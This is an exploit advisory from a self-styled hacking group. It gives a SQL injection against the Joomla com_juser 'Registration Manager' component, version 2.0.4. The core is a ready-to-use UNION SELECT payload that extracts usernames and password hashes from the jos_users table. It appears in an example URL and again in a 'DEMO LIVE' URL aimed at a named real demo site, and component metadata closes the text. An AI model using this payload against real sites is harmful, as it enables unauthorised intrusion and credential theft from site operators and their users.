###################################################
[+] Author : Chip D3 Bi0s
[+] Author Name : Russell...
[+] Email : chipdebios[alt+64]gmail.com
[+] Greetz : d4n1ux + eCORE + rayok3nt + x_jeshua
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
[+] Google Dork : imagine ;)
[+] Email : chipdebios[alt+64]gmail.com
###################################################
Example:
http://localHost/path/index.php?option=com_juser&task=show_profile&id=70[SQL code]
------
SQL code:
+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--
-----
DEMO LIVE:
http://demo.joomlaequipment.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
<creationDate>25.05.2007</creationDate>
<author>Joomlaequipment</author>
<copyright>Joomlaequipment"©2007</copyright>
<license>Comercial</license>
<authorEmail>support@joomlaequipment.com</authorEmail>
<authorUrl>http://joomlaequipment.com</authorUrl>
<version>2.0.4</version>
<description>Registration Manager</description>